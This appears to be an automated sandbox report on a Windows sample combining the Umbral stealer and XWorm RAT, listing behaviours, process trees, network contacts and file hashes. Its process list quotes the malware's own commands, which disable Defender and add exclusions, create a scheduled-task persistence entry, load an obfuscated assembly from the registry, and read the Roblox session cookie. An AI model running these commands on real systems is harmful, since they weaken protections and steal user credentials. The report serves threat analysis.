Malware Analysis Report

2024-10-10 09:55

Sample ID 240708-wdlndatbpf
Target rootkit.exe
SHA256 f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
Tags
umbral xworm evasion execution persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Threat Level: Known bad

The file rootkit.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm evasion execution persistence rat spyware stealer trojan

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies security service

Xworm

Detect Umbral payload

Umbral

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Modifies registry class

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-08 17:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-08 17:48

Reported

2024-07-08 17:51

Platform

win7-20240705-en

Max time kernel

150s

Max time network

95s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2256 created 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2256 set thread context of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0f6bb145fd1da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2700 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2700 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2700 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2700 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2700 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2700 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2700 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2700 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2356 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2356 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1696 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 1696 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 1696 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2356 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1744 wrote to memory of 476 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\services.exe
PID 1744 wrote to memory of 488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1744 wrote to memory of 496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsm.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 604 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 680 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 752 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1744 wrote to memory of 812 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1744 wrote to memory of 840 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 964 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 108 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 1016 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 1744 wrote to memory of 1036 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 1108 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhost.exe
PID 1744 wrote to memory of 1172 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\Dwm.exe
PID 1744 wrote to memory of 1232 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 1744 wrote to memory of 1288 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 1744 wrote to memory of 1628 N/A C:\Windows\System32\dllhost.exe C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
PID 1744 wrote to memory of 620 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 1744 wrote to memory of 2740 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 2868 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sppsvc.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {993F2002-18FA-436D-B11F-81CE7F5E0440} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+'w'+'w'+''+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d15b2779-7884-4cbb-a64a-f2b5142ac124}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/2700-0-0x000007FEF6353000-0x000007FEF6354000-memory.dmp

memory/2700-1-0x0000000000120000-0x000000000016A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

memory/2700-10-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

memory/2904-12-0x0000000001340000-0x0000000001350000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/2904-17-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

memory/2356-16-0x0000000000BC0000-0x0000000000C00000-memory.dmp

memory/2576-22-0x000000001B680000-0x000000001B962000-memory.dmp

memory/2576-23-0x0000000002890000-0x0000000002898000-memory.dmp

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 26ebfd1c75ffead44f160c4a5e73d96e
SHA1 8d0a378aefa87d4c2fd4a1ea24e553789be1f02d
SHA256 8e37b54f1de33de46256a947db93ddbcce64760b44f0ff73e2e73bd6aa4ad885
SHA512 2fc75e4180d55119ef3ff3301fd085b595975fb7b1ed579e50f3b024deff7fa2e6e191732995a837e88339d7e66eeaa48a5ab774c68ac4235fe065be85cd0bb3

memory/2700-35-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

memory/2928-36-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2928-37-0x0000000002390000-0x0000000002398000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b0a17851316b39d3872d89ba00a56cfe
SHA1 cad7bb3fd0701a969451d979fd6325383ec0caf0
SHA256 e999f4104aae26d0f7bd9c088db3e36dc0413b554bdd39ac3ad2006f5cc50a1e
SHA512 54af72d60dcecf61889d51ec8b11d242b05ed0674dccc17234b058036ecdccd17483f24f51e98a5573fa86663137b1cb0372227687d42941da224fe328820d6d

memory/1724-44-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

memory/2256-57-0x000000001A350000-0x000000001A37A000-memory.dmp

memory/2256-59-0x00000000778A0000-0x00000000779BF000-memory.dmp

memory/1744-63-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1744-62-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1744-61-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1744-65-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1744-60-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1744-67-0x00000000778A0000-0x00000000779BF000-memory.dmp

memory/1744-68-0x0000000140000000-0x0000000140008000-memory.dmp

memory/432-74-0x00000000004C0000-0x00000000004EC000-memory.dmp

memory/432-73-0x0000000000490000-0x00000000004B6000-memory.dmp

memory/432-71-0x0000000000490000-0x00000000004B6000-memory.dmp

memory/1744-66-0x0000000077AC0000-0x0000000077C69000-memory.dmp

memory/2256-58-0x0000000077AC0000-0x0000000077C69000-memory.dmp

memory/432-92-0x0000000037B00000-0x0000000037B10000-memory.dmp

memory/432-91-0x000007FEBDCF0000-0x000007FEBDD00000-memory.dmp

memory/432-90-0x00000000004C0000-0x00000000004EC000-memory.dmp

memory/432-84-0x00000000004C0000-0x00000000004EC000-memory.dmp

memory/488-116-0x0000000037B00000-0x0000000037B10000-memory.dmp

memory/496-122-0x00000000007D0000-0x00000000007FC000-memory.dmp

memory/488-115-0x000007FEBDCF0000-0x000007FEBDD00000-memory.dmp

memory/488-114-0x00000000000E0000-0x000000000010C000-memory.dmp

memory/488-108-0x00000000000E0000-0x000000000010C000-memory.dmp

memory/476-106-0x0000000037B00000-0x0000000037B10000-memory.dmp

memory/476-105-0x000007FEBDCF0000-0x000007FEBDD00000-memory.dmp

memory/476-104-0x0000000000080000-0x00000000000AC000-memory.dmp

memory/476-98-0x0000000000080000-0x00000000000AC000-memory.dmp

memory/2904-248-0x000007FEF6350000-0x000007FEF6D3C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-08 17:48

Reported

2024-07-08 17:51

Platform

win10v2004-20240704-en

Max time kernel

150s

Max time network

131s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3688 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\XClient C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
